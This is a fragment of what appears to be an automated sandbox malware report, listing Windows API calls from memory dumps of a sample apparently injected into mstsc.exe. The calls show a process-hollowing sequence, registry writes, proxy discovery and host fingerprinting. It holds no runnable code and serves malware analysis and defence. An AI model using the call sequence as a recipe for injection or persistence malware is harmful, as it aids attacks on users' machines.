    • lstrlenW.KERNEL32(00106D80,76AD46E9,7142434B,76E6FE8D), ref: 00068921
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00068941
    • HeapAlloc.KERNEL32(00000000), ref: 00068944
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00068963
    • HeapAlloc.KERNEL32(00000000), ref: 00068966
    • lstrcpyW.KERNEL32(00000000,?), ref: 0006897B
    • GetProcessHeap.KERNEL32(00000008,00000021), ref: 000689BB
    • HeapAlloc.KERNEL32(00000000), ref: 000689BE
    • GetClipboardOwner.USER32 ref: 000689D2
    • GetTickCount.KERNEL32(00000005), ref: 000689FE
    • wsprintfW.USER32 ref: 00068A0F
    • wsprintfW.USER32 ref: 00068A1F
    • GetProcessHeap.KERNEL32(00000008,00000104), ref: 00068A33
    • HeapAlloc.KERNEL32(00000000), ref: 00068A36
    • GetTickCount.KERNEL32 ref: 00068A47
    • GetProcessHeap.KERNEL32(00000008,00000044), ref: 00068AE0
    • HeapAlloc.KERNEL32(00000000), ref: 00068AE3
    • GetClipboardSequenceNumber.USER32 ref: 00068AF7
    • wsprintfA.USER32 ref: 00068B2D
      • Part of subcall function 0006DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
      • Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
      • Part of subcall function 0006DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
      • Part of subcall function 0006DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
      • Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
      • Part of subcall function 0006DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
      • Part of subcall function 0006DD0B: CloseHandle.KERNEL32(00000000), ref: 0006DD9C
      • Part of subcall function 0006DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
      • Part of subcall function 0006DD0B: HeapFree.KERNEL32(00000000), ref: 0006DDB0
    • HeapFree.KERNEL32(00000000), ref: 00068B79
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00068799
      • Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 0006879C
      • Part of subcall function 00068761: GetTickCount.KERNEL32 ref: 000687B8
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00068804
      • Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 00068807
      • Part of subcall function 00068761: GetCapture.USER32 ref: 00068819
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006886A
      • Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 00068871
      • Part of subcall function 00068761: GetCursor.USER32 ref: 00068885
      • Part of subcall function 00068761: LoadLibraryA.KERNEL32(66713859), ref: 000688B6
      • Part of subcall function 00068761: GetProcAddress.KERNEL32(00000000), ref: 000688BD
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000688DF
      • Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 000688EC
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,66713859), ref: 000688F7
      • Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 000688FA
      • Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,?), ref: 00068901
      • Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 00068904
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068B60
    • HeapFree.KERNEL32(00000000), ref: 00068B67
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B76
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068B84
    • HeapFree.KERNEL32(00000000), ref: 00068B87
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B90
    • HeapFree.KERNEL32(00000000), ref: 00068B93
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B9F
    • HeapFree.KERNEL32(00000000), ref: 00068BA2
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
    • HeapAlloc.KERNEL32(00000000), ref: 00064881
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
    • HeapAlloc.KERNEL32(00000000), ref: 0006489D
    • OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
    • OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
    • ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
    • GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
    • GetLastError.KERNEL32 ref: 00064944
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
    • HeapAlloc.KERNEL32(00000000), ref: 0006495B
    • GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
    • GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
    • HeapAlloc.KERNEL32(00000000), ref: 00064A0F
    • GetCursor.USER32 ref: 00064A20
    • wsprintfW.USER32 ref: 00064A53
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
    • HeapFree.KERNEL32(00000000), ref: 00064A75
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
    • HeapFree.KERNEL32(00000000), ref: 00064A7F
    • CloseHandle.KERNEL32(00000000), ref: 00064A84
    • CloseHandle.KERNEL32(?), ref: 00064A8D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
    • HeapFree.KERNEL32(00000000), ref: 00064A9E
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
    • HeapFree.KERNEL32(00000000), ref: 00064AA6
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?,00000000,?,00000000), ref: 000635E0
    • WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000), ref: 0006361F
    • WinHttpGetProxyForUrl.WINHTTP(00000000,?,00000000,?), ref: 00063677
    • StrCpyW.SHLWAPI(?,00000000), ref: 0006368D
    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00063694
    • GlobalFree.KERNEL32(00000000), ref: 000636A9
    • GlobalFree.KERNEL32(00000000), ref: 000636B8
    • WinHttpCloseHandle.WINHTTP(00000000), ref: 000636C0
    • GlobalFree.KERNEL32(00000000), ref: 000636D5
    • GlobalFree.KERNEL32(00000000), ref: 000636E0
    • PathMatchSpecW.SHLWAPI(?,00000000), ref: 000636FD
    • StrCpyW.SHLWAPI(?,00000000), ref: 0006372D
    • GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006376A
    • HeapAlloc.KERNEL32(00000000), ref: 0006376D
    • GetDoubleClickTime.USER32 ref: 0006378B
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 000637E0
    • HeapAlloc.KERNEL32(00000000), ref: 000637E3
    • GetCurrentThreadId.KERNEL32 ref: 000637F7
    • StrStrIW.SHLWAPI(?,?), ref: 00063824
    • StrStrIW.SHLWAPI(00000000,00000000), ref: 0006384C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063886
    • HeapFree.KERNEL32(00000000), ref: 0006388F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00063894
    • HeapFree.KERNEL32(00000000), ref: 00063897
    • GlobalFree.KERNEL32(00000000), ref: 000638AA
    • GlobalFree.KERNEL32(?), ref: 000638B4
    • GlobalFree.KERNEL32(00000000), ref: 000638BF
    • StrCpyW.SHLWAPI(?,-00000002), ref: 000638D1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000638DA
    • HeapFree.KERNEL32(00000000), ref: 000638E7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000638EC
    • HeapFree.KERNEL32(00000000), ref: 000638F3
      • Part of subcall function 00063551: WinHttpCrackUrl.WINHTTP(?,?,00000000,0000003C,?,00000208), ref: 00063593
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,0007CAA8), ref: 00063E3F
    • HeapAlloc.KERNEL32(00000000), ref: 00063E42
      • Part of subcall function 00063950: GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00063971
      • Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000008,00000025), ref: 000639B0
      • Part of subcall function 00063950: HeapAlloc.KERNEL32(00000000), ref: 000639B7
      • Part of subcall function 00063950: GetCurrentProcessId.KERNEL32 ref: 000639C8
      • Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000008,00000051), ref: 00063A72
      • Part of subcall function 00063950: HeapAlloc.KERNEL32(00000000), ref: 00063A79
      • Part of subcall function 00063950: GetForegroundWindow.USER32 ref: 00063A8A
      • Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063AC8
      • Part of subcall function 00063950: HeapFree.KERNEL32(00000000), ref: 00063ACF
      • Part of subcall function 000638F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0006131B,00000000,0006131B,00000000,00000001,?,0006131B,00020006), ref: 00063929
      • Part of subcall function 000638F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0006131B,0006131B,?,0006131B,00020006), ref: 0006393C
    • GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00063ED2
    • HeapAlloc.KERNEL32(00000000), ref: 00063ED9
    • GetTickCount.KERNEL32 ref: 00063EED
    • wsprintfW.USER32 ref: 00063F24
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063F6E
    • HeapAlloc.KERNEL32(00000000), ref: 00063F71
    • GetCaretBlinkTime.USER32 ref: 00063F86
    • wsprintfW.USER32 ref: 00063FC8
    • RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0006401D
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0006402C
    • HeapAlloc.KERNEL32(00000000), ref: 0006402F
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00064051
    • RegCloseKey.ADVAPI32(?), ref: 00064077
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00064099
    • HeapAlloc.KERNEL32(00000000), ref: 0006409C
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 000640AE
    • HeapReAlloc.KERNEL32(00000000), ref: 000640B1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000640D5
    • HeapFree.KERNEL32(00000000), ref: 000640D8
    • GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 000640E4
    • HeapFree.KERNEL32(00000000), ref: 000640ED
    • RegCloseKey.ADVAPI32(?), ref: 000640FC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00064107
    • HeapFree.KERNEL32(00000000), ref: 0006410A
    • GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00064112
    • HeapFree.KERNEL32(00000000), ref: 00064115
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000002), ref: 00067C57
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067C5A
    • GetShellWindow.USER32 ref: 00067C6F
    • GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00067CF0
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067CF3
    • GetProcessWindowStation.USER32 ref: 00067D08
    • GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00067D47
    • GetProcAddress.KERNEL32(00000000,00000000,?,00000002), ref: 00067D70
    • GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00067D86
    • GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00067DED
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067DF0
    • GetProcessWindowStation.USER32 ref: 00067E02
    • GetProcAddress.KERNEL32(00000000,?,00000002), ref: 00067E31
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00067E3F
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 00067E42
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0006752D
      • Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 00067530
      • Part of subcall function 000674D8: GetMessageTime.USER32 ref: 00067544
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006759E
      • Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 000675A1
      • Part of subcall function 000674D8: IsSystemResumeAutomatic.KERNEL32 ref: 000675B5
      • Part of subcall function 000674D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 000675E6
      • Part of subcall function 000674D8: GetProcAddress.KERNEL32(00000000), ref: 000675ED
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067601
      • Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 0006760A
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0006760F
      • Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 00067612
      • Part of subcall function 000674D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0006762E
      • Part of subcall function 000674D8: IsWow64Process.KERNELBASE(00000000,00000000), ref: 0006763F
      • Part of subcall function 000674D8: CloseHandle.KERNEL32(00000000), ref: 0006764D
    • GetProcessHeap.KERNEL32(00000008,00000200,?,00000002), ref: 00067E89
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067E8C
    • GetProcessHeap.KERNEL32(00000008,00000100,?,00000002), ref: 00067EA4
    • HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067EA7
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 00068082
      • Part of subcall function 00067A57: GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 00067A81
      • Part of subcall function 00067A57: GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 00067AC1
      • Part of subcall function 00067A57: HeapAlloc.KERNEL32(00000000), ref: 00067AC8
      • Part of subcall function 00067A57: GetShellWindow.USER32 ref: 00067ADF
      • Part of subcall function 00067A57: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 00067B50
      • Part of subcall function 00067A57: HeapAlloc.KERNEL32(00000000), ref: 00067B57
      • Part of subcall function 00067A57: DestroyCaret.USER32 ref: 00067B6D
      • Part of subcall function 00067A57: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00067B9E
      • Part of subcall function 00067A57: GetProcAddress.KERNEL32(00000000), ref: 00067BA5
      • Part of subcall function 00067A57: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067BB4
      • Part of subcall function 00067A57: HeapFree.KERNEL32(00000000), ref: 00067BC1
      • Part of subcall function 00067A57: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067BC5
      • Part of subcall function 00067A57: HeapFree.KERNEL32(00000000), ref: 00067BCC
      • Part of subcall function 00067A57: CloseHandle.KERNEL32(00000002), ref: 00067C02
    • GetProcessHeap.KERNEL32(00000000,76E6FE8D,?,00000002), ref: 00068065
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 0006806C
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 0006807F
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 000680B5
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 000680BE
    • GetProcessHeap.KERNEL32(00000000,?,?,00000002), ref: 000680C3
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 000680C6
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,?,00000000,76E6FE8D), ref: 00069C4C
    • HeapAlloc.KERNEL32(00000000), ref: 00069C59
    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D22
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D29
    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D43
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D74
    • lstrcatW.KERNEL32(?,?), ref: 00069D85
    • lstrcatW.KERNEL32(?,00070518), ref: 00069D8D
    • lstrcatW.KERNEL32(?,?), ref: 00069D93
    • lstrcatW.KERNEL32(?,00070520), ref: 00069D9B
    • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069DAA
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00069DCB
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069DD4
    • HeapFree.KERNEL32(00000000), ref: 00069DDB
    • GetThreadContext.KERNEL32(?,00010002), ref: 00069E05
    • HeapFree.KERNEL32(00000000), ref: 0006A0DD
      • Part of subcall function 0006F995: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0006F9F1
      • Part of subcall function 0006F995: HeapAlloc.KERNEL32(00000000), ref: 0006F9F4
      • Part of subcall function 0006F995: GetShellWindow.USER32 ref: 0006FA08
      • Part of subcall function 0006F995: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006FA67
      • Part of subcall function 0006F995: HeapAlloc.KERNEL32(00000000), ref: 0006FA6A
      • Part of subcall function 0006F995: GetCapture.USER32 ref: 0006FA7E
      • Part of subcall function 0006F995: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006FAAF
      • Part of subcall function 0006F995: GetProcAddress.KERNEL32(00000000), ref: 0006FAB6
      • Part of subcall function 0006F995: CloseHandle.KERNEL32(00000000), ref: 0006FB4A
      • Part of subcall function 0006F995: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FB59
      • Part of subcall function 0006F995: HeapFree.KERNEL32(00000000), ref: 0006FB62
      • Part of subcall function 0006F995: GetProcessHeap.KERNEL32(00000000,?), ref: 0006FB69
      • Part of subcall function 0006F995: HeapFree.KERNEL32(00000000), ref: 0006FB6C
    • SetLastError.KERNEL32(00000000), ref: 00069FC9
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00069FF4
    • IsBadReadPtr.KERNEL32(EpiTo,00000001), ref: 0006A01C
    • IsBadReadPtr.KERNEL32(?,00000004), ref: 0006A038
    • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0006A068
    • ResumeThread.KERNEL32(?), ref: 0006A07E
    • CloseHandle.KERNEL32(00000000), ref: 0006A0A2
      • Part of subcall function 0006F859: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0006F888
      • Part of subcall function 0006F859: HeapAlloc.KERNEL32(00000000), ref: 0006F88F
      • Part of subcall function 0006F859: GetShellWindow.USER32 ref: 0006F8A1
      • Part of subcall function 0006F859: GetProcessHeap.KERNEL32(00000008,00000016), ref: 0006F905
      • Part of subcall function 0006F859: HeapAlloc.KERNEL32(00000000), ref: 0006F90C
      • Part of subcall function 0006F859: CloseClipboard.USER32 ref: 0006F920
      • Part of subcall function 0006F859: LoadLibraryA.KERNEL32(?), ref: 0006F951
      • Part of subcall function 0006F859: GetProcAddress.KERNEL32(00000000), ref: 0006F958
      • Part of subcall function 0006F859: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F971
      • Part of subcall function 0006F859: HeapFree.KERNEL32(00000000), ref: 0006F97E
      • Part of subcall function 0006F859: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F983
      • Part of subcall function 0006F859: HeapFree.KERNEL32(00000000), ref: 0006F98A
      • Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0006F74E
      • Part of subcall function 0006F6F4: HeapAlloc.KERNEL32(00000000), ref: 0006F751
      • Part of subcall function 0006F6F4: GetClipboardSequenceNumber.USER32 ref: 0006F766
      • Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F7B8
      • Part of subcall function 0006F6F4: HeapAlloc.KERNEL32(00000000), ref: 0006F7BB
      • Part of subcall function 0006F6F4: GetShellWindow.USER32 ref: 0006F7CF
      • Part of subcall function 0006F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0006F800
      • Part of subcall function 0006F6F4: GetProcAddress.KERNEL32(00000000), ref: 0006F807
      • Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F835
      • Part of subcall function 0006F6F4: HeapFree.KERNEL32(00000000), ref: 0006F842
      • Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F847
      • Part of subcall function 0006F6F4: HeapFree.KERNEL32(00000000), ref: 0006F84E
    • TerminateProcess.KERNEL32(?,00000000), ref: 0006A0B5
    • CloseHandle.KERNEL32(?), ref: 0006A0BF
    • CloseHandle.KERNEL32(?), ref: 0006A0C9
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A0D6
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,00000000), ref: 00063B01
    • HeapAlloc.KERNEL32(00000000), ref: 00063B04
      • Part of subcall function 00063950: GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00063971
      • Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000008,00000025), ref: 000639B0
      • Part of subcall function 00063950: HeapAlloc.KERNEL32(00000000), ref: 000639B7
      • Part of subcall function 00063950: GetCurrentProcessId.KERNEL32 ref: 000639C8
      • Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000008,00000051), ref: 00063A72
      • Part of subcall function 00063950: HeapAlloc.KERNEL32(00000000), ref: 00063A79
      • Part of subcall function 00063950: GetForegroundWindow.USER32 ref: 00063A8A
      • Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063AC8
      • Part of subcall function 00063950: HeapFree.KERNEL32(00000000), ref: 00063ACF
      • Part of subcall function 000638F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0006131B,00000000,0006131B,00000000,00000001,?,0006131B,00020006), ref: 00063929
      • Part of subcall function 000638F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0006131B,0006131B,?,0006131B,00020006), ref: 0006393C
    • GetProcessHeap.KERNEL32(00000008,00000039,00020006), ref: 00063BC8
    • HeapAlloc.KERNEL32(00000000), ref: 00063BCB
    • GetTickCount.KERNEL32 ref: 00063BDF
    • wsprintfW.USER32 ref: 00063C16
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063C56
    • HeapAlloc.KERNEL32(00000000), ref: 00063C59
    • GetCaretBlinkTime.USER32 ref: 00063C6D
    • wsprintfW.USER32 ref: 00063CB2
    • RegDeleteValueW.ADVAPI32(?,?), ref: 00063CC5
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063CD4
    • HeapFree.KERNEL32(00000000), ref: 00063CD7
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063D22
    • HeapAlloc.KERNEL32(00000000), ref: 00063D25
    • GetCaretBlinkTime.USER32 ref: 00063D39
    • wsprintfW.USER32 ref: 00063D7E
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00063DAE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063DC6
    • HeapFree.KERNEL32(00000000), ref: 00063DC9
    • RegCloseKey.ADVAPI32(?), ref: 00063DEA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00063DF5
    • HeapFree.KERNEL32(00000000), ref: 00063DF8
    • GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00063E04
    • HeapFree.KERNEL32(00000000), ref: 00063E07
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000029), ref: 0006D0F6
    • HeapAlloc.KERNEL32(00000000), ref: 0006D0FD
    • GetCapture.USER32 ref: 0006D10F
    • WSAStartup.WS2_32(00000201,?), ref: 0006D147
    • GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006D1F5
    • HeapAlloc.KERNEL32(00000000), ref: 0006D1FC
    • GetCurrentThreadId.KERNEL32 ref: 0006D20E
    • wsprintfA.USER32 ref: 0006D241
    • Sleep.KERNEL32(-0000EA60,00000000,?,00000000,00000000), ref: 0006D2A1
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D2CF
    • HeapFree.KERNEL32(00000000), ref: 0006D2D6
      • Part of subcall function 000647D4: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76E6C570,0006D305,00000000,?,00000000,00000000), ref: 000647F4
      • Part of subcall function 000647D4: HeapFree.KERNEL32(00000000), ref: 000647F7
      • Part of subcall function 000647D4: GetProcessHeap.KERNEL32(00000008,?,?,00000000,76E6C570,0006D305,00000000,?,00000000,00000000), ref: 00064801
      • Part of subcall function 000647D4: HeapAlloc.KERNEL32(00000000), ref: 00064804
      • Part of subcall function 0006482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0006318E,?,?,?,?,?,?,?,?,?,?,00062973), ref: 00064845
      • Part of subcall function 0006482B: HeapFree.KERNEL32(00000000,?,?), ref: 0006484C
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D310
    • HeapFree.KERNEL32(00000000), ref: 0006D317
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D326
    • HeapFree.KERNEL32(00000000), ref: 0006D32D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006D33E
    • HeapFree.KERNEL32(00000000), ref: 0006D345
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,0006E7ED,?), ref: 0006E39F
    • GetProcessHeap.KERNEL32(00000008,000000C8,774229EE,76E6FE8D), ref: 0006E3B7
    • HeapAlloc.KERNEL32(00000000), ref: 0006E3BE
    • RegQueryValueExA.ADVAPI32(0006E7ED,?,00000000,00000000,00000000,?), ref: 0006E3EB
    • RegQueryValueExA.ADVAPI32(0006E7ED,74736E49,00000000,00000000,?,00000004), ref: 0006E411
    • RegQueryValueExA.ADVAPI32(0006E7ED,49676552,00000000,00000000,?,00000004), ref: 0006E43F
    • GetTickCount.KERNEL32 ref: 0006E445
    • RegCloseKey.ADVAPI32(0006E7ED), ref: 0006E451
    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,0004001F,0006E7ED), ref: 0006E467
    • RegSetValueExA.ADVAPI32(0006E7ED,49676552,00000000,00000004,?,00000004), ref: 0006E482
    • RegCloseKey.ADVAPI32(0006E7ED), ref: 0006E499
    • lstrlenA.KERNEL32(00000008), ref: 0006E4A5
    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0006E4CB
    • HeapAlloc.KERNEL32(00000000), ref: 0006E4D2
    • GetComputerNameA.KERNEL32(00000000,00000004), ref: 0006E4DF
    • lstrlenA.KERNEL32(00000000), ref: 0006E4E6
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E503
    • HeapFree.KERNEL32(00000000), ref: 0006E510
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006E517
    • HeapFree.KERNEL32(00000000), ref: 0006E51E
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetSystemTime.KERNEL32(?,00000000,?,00000000), ref: 0006DAF2
    • SystemTimeToFileTime.KERNEL32(?,?,0000003B), ref: 0006DBA6
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0006DBAD
    • SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0006DBB6
